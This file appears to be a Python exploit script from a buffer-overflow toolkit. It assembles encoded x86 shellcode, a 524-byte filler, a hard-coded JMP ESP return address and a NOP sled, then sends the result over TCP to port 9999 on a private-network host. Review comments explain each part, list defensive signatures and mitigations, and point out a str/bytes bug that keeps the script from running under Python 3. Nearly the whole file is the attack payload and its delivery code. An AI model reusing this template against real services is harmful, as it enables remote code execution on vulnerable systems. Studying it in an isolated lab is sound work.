5-OpenCalc.py
#!/usr/bin/python3
#_*_ coding: utf8 _*_
import socket
"""
Project repository: https://github.com/JoshuaProvoste/Stack-Buffer-Overflow-Python-Toolkit
"""
# Opaque machine-code payload, built up chunk by chunk into one bytes object.
# The file name (5-OpenCalc.py) and the name calc_payload suggest it starts a
# calculator as a harmless proof of code execution; that cannot be confirmed
# from the bytes alone, so treat it as untrusted code and keep it in an
# isolated lab.
# NOTE(review): the d9 74 24 f4 sequence in the first chunk decodes as x86
# `fnstenv [esp-0xc]`, a get-EIP idiom common in self-decoding payloads. The
# body is presumably encoded and will not show readable strings; confirm
# before relying on static inspection.
buf = b""
buf += b"\xbf\x3f\x5c\x19\xba\xd9\xce\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0\x3b\xbe"
buf += b"\xec\x46\xab\xbc\x0f\xb7\x2b\xa1\x86\x52\x1a\xe1\xfd"
buf += b"\x17\x0c\xd1\x76\x75\xa0\x9a\xdb\x6e\x33\xee\xf3\x81"
buf += b"\xf4\x45\x22\xaf\x05\xf5\x16\xae\x85\x04\x4b\x10\xb4"
buf += b"\xc6\x9e\x51\xf1\x3b\x52\x03\xaa\x30\xc1\xb4\xdf\x0d"
buf += b"\xda\x3f\x93\x80\x5a\xa3\x63\xa2\x4b\x72\xf8\xfd\x4b"
buf += b"\x74\x2d\x76\xc2\x6e\x32\xb3\x9c\x05\x80\x4f\x1f\xcc"
buf += b"\xd9\xb0\x8c\x31\xd6\x42\xcc\x76\xd0\xbc\xbb\x8e\x23"
buf += b"\x40\xbc\x54\x5e\x9e\x49\x4f\xf8\x55\xe9\xab\xf9\xba"
buf += b"\x6c\x3f\xf5\x77\xfa\x67\x19\x89\x2f\x1c\x25\x02\xce"
buf += b"\xf3\xac\x50\xf5\xd7\xf5\x03\x94\x4e\x53\xe5\xa9\x91"
buf += b"\x3c\x5a\x0c\xd9\xd0\x8f\x3d\x80\xbe\x4e\xb3\xbe\x8c"
buf += b"\x51\xcb\xc0\xa0\x39\xfa\x4b\x2f\x3d\x03\x9e\x14\xa1"
buf += b"\xe1\x0b\x60\x4a\xbc\xd9\xc9\x17\x3f\x34\x0d\x2e\xbc"
buf += b"\xbd\xed\xd5\xdc\xb7\xe8\x92\x5a\x2b\x80\x8b\x0e\x4b"
buf += b"\x37\xab\x1a\x28\xd6\x3f\xc6\x81\x7d\xb8\x6d\xde"
# Target host and TCP port, hard-coded. 192.168.21.140 is an RFC 1918 private
# address, i.e. a machine on the author's local network.
xp = "192.168.21.140"
port = 9999
# 524 filler characters ("A", 0x41). Presumably the distance from the start of
# the vulnerable buffer to the saved return address -- verify against the target.
A = "\x41" * 524
# Four characters that, read as a little-endian 32-bit value, give 0x311712F3.
# The name suggests the address of a JMP ESP instruction in the target
# process. A fixed address only works if that module loads at the same base
# every run, so this presumably relies on ASLR being absent for that module.
jmp_esp = "\xF3\x12\x17\x31"
# 20 x 0x90 (x86 NOP) placed between the overwritten return address and buf.
nops = "\x90" * 20
# Final layout: filler | return-address overwrite | NOP padding | payload.
# Defender's view: a long run of 0x41 followed by a 0x90 run in traffic to
# this service is a simple signature for this class of request, and
# DEP/NX, ASLR and stack canaries on the target each break the layout.
# NOTE(review): A, jmp_esp and nops are str while buf is bytes. Under the
# python3 shebang this concatenation raises TypeError, so the script as
# written stops here and never reaches the socket code below.
calc_payload = A + jmp_esp + nops + buf
# Deliver calc_payload to xp:port over a single TCP connection.
# NOTE(review): no timeout is set on the socket in this block, so connect()
# and recv() block for as long as the OS allows.
# NOTE(review): the socket is not closed on the success path or in the
# ConnectionRefusedError handler; a `with` block or `finally` would make
# cleanup unconditional.
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((xp,port))
    # Read and discard up to 1024 bytes -- presumably the service banner.
    sock.recv(1024)
    # One send() call; its return value (bytes actually written) is ignored.
    sock.send(calc_payload)
except ConnectionRefusedError:
    # Nothing is listening on xp:port.
    print("Connection error. Review the IP address or port.")
    exit()
except socket.timeout:
    # NOTE(review): if socket.socket() itself had raised, `sock` would be
    # unbound in this handler and the two below.
    sock.close()
    print("\nConnection error. Timeout!")
except socket.error:
    # Any other socket-level failure is swallowed without a message, so a
    # reset or an unreachable host looks the same as success to the operator.
    sock.close()
    pass
except KeyboardInterrupt:
    # Ctrl-C: close the socket and leave.
    sock.close()
    print("\n\nConnection closed. Bye!")
    exit()